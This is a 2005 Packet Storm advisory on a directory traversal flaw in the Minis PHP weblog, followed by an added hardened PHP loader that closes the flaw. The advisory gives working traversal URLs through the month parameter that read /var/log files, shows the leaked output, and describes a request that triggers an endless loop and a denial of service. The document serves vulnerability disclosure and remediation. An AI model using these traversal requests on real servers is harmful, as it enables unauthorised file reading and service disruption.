
MinisTraverse.txt

16 Jan 2005 · Reported by Madelman · Type: packetstorm · Source: packetstormsecurity.com

Minis directory traversal vulnerability allows file reading without proper checks on month parameter.

Code
`-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA1  
  
  
Title: Minis directory traversal vulnerability  
Vulnerability discovery: Madelman <madelman AT iname.com>  
Date: 31/12/2004  
Severity: Moderate  
  
Summary:  
- --------  
  
(from vendor site: http://minis.sourceforge.net/)  
  
Minis is a tiny, PHP-powered, text-file based weblogging system.  
It is easily configured for normal use and it doesn't require any  
databases, such as MySQL. Also, with some PHP-knowledge you'll be  
able to configure Minis endlessly.  
  
Minis doesn't check the month parameter, which allows reading any file with   
a .log extension.  
  
This vulnerability has been tested with Minis 0.2.1  
  
  
Details:  
- --------  
  
If we want to read /var/log/XFree86.0.log:  
  
REQUEST:  
http://[SERVER]/minis/minis.php?month=../../../../../../../../var/log/XFree86.0  
RETURNS: (looking at source of HTML)  
[...]  
"></a><br>: <a   
href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=This   
is a pre-release version of XFree86, and is not supported in any  
"></a><br>: <a   
href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=way.   
Bugs may be reported to [email protected] and patches submitted  
"></a><br>: <a   
href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=to   
[email protected]. Before reporting bugs in pre-release versions,  
"></a><br>: <a   
href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=please   
check the latest version in the XFree86 CVS repository  
"></a><br>: <a   
href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=(http://www.XFree86.Org/cvs).  
"></a><br>: <a   
href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=  
"></a><br>: <a   
href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=XFree86 Version 4.3.0.1 (Debian 4.3.0.dfsg.1-4 20040529113443 [email protected])  
"></a><br>: <a   
href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=Release Date: 15 August 2003  
"></a><br>: <a   
href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=X   
Protocol Version 11, Revision 0, Release 6.6  
"></a><br>: <a   
href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=Build   
Operating System: Linux 2.6.6-rc3-bk9 i686 [ELF]  
"></a><br>: <a   
href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=Build   
Date: 29 May 2004  
[...]  
  
If we try to read a file that doesn't exist (in this example   
/var/log/XFree86.log) Minis returns "No such month"  
  
REQUEST:  
http://[SERVER]/minis/minis.php?month=../../../../../../../../var/log/XFree86  
RESPONSE:  
No such month.  
  
  
If we try to read a file the webserver doesn't have authorization to read, Minis   
enters an endless loop, which could cause the server to spend an incredible   
amount of bandwidth or even result in a DoS.  
  
REQUEST:  
http://[SERVER]/minis/minis.php?month=../../../../../../../../var/log/auth  
RETURNS:  
Warning: fopen(blog/../../../../../../../../var/log/auth.log): failed to   
open stream: Permission denied in /var/www/minis/minis.php on line 109  
  
../../../../../../../../var/log/auth  
  
Warning: feof(): supplied argument is not a valid stream resource in   
/var/www/minis/minis.php on line 111  
  
Warning: fgets(): supplied argument is not a valid stream resource in   
/var/www/minis/minis.php on line 112  
  
Warning: feof(): supplied argument is not a valid stream resource in   
/var/www/minis/minis.php on line 111  
  
Warning: fgets(): supplied argument is not a valid stream resource in   
/var/www/minis/minis.php on line 112  
[...]  
  
  
Timeline  
- --------  
  
31/12/2004 - Vulnerability found  
31/12/2004 - Vendor contacted  
16/01/2005 - Vendor hasn't replied. Advisory released  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1.2.3 (MingW32)  
Comment: Using GnuPG with Thunderbird - http://enigmail.mozdev.org  
  
iD8DBQFB6qyg3RWooxY20cIRAg4cAJ41z36lEK44et5nx4V6tspofoo+zACgnLr6  
nUEj8oDBySiBN2ScbMinO7s=  
=sSF1  
-----END PGP SIGNATURE-----  
`
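
A hardened way to load a month file that closes both problems the advisory describes: the unchecked `month` parameter and the unchecked `fopen()` result feeding the `feof()`/`fgets()` loop. This is an added example, not code from Minis or from the advisory; the function name `read_month`, the `blog/<month>.log` layout and the `YYYY-MM` month format are assumptions.

```php
<?php
// Added example: hypothetical hardened loader, not the Minis source.
// Assumptions: entries live in ./blog/<month>.log and month names look
// like "2004-12"; the advisory does not show the real naming scheme.

const BLOG_DIR = __DIR__ . '/blog';

/**
 * Return the lines of one month's log, or null if the request is rejected.
 */
function read_month(string $month): ?array
{
    // 1. Allow-list the parameter: slashes, dots and NUL bytes cannot pass.
    if (!preg_match('/\A\d{4}-\d{2}\z/', $month)) {
        return null;
    }

    // 2. Resolve symlinks and confirm the file is still inside BLOG_DIR.
    $base = realpath(BLOG_DIR);
    $path = realpath(BLOG_DIR . '/' . $month . '.log');
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;                 // missing file, or outside the blog directory
    }

    // 3. Check fopen(): a loop on feof() over a failed handle never terminates.
    $fp = @fopen($path, 'r');
    if ($fp === false) {
        return null;
    }

    $lines = [];
    while (($line = fgets($fp)) !== false) {   // stops on EOF and on read errors
        $lines[] = rtrim($line, "\r\n");
    }
    fclose($fp);
    return $lines;
}

// Constructed inputs: one well-formed month and the advisory's two requests.
foreach (['2004-12', '../../../../../../../../var/log/XFree86.0',
          '../../../../../../../../var/log/auth'] as $m) {
    $entries = read_month($m);
    // Escape anything echoed back: the advisory's output shows the raw
    // parameter placed inside href attributes.
    echo htmlspecialchars($m, ENT_QUOTES), ' => ',
         $entries === null ? 'No such month.' : count($entries) . ' entries', "\n";
}
```

Both traversal strings are rejected at step 1 with the same "No such month." response a missing file gets, so the reply no longer distinguishes a nonexistent file from an unreadable one.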
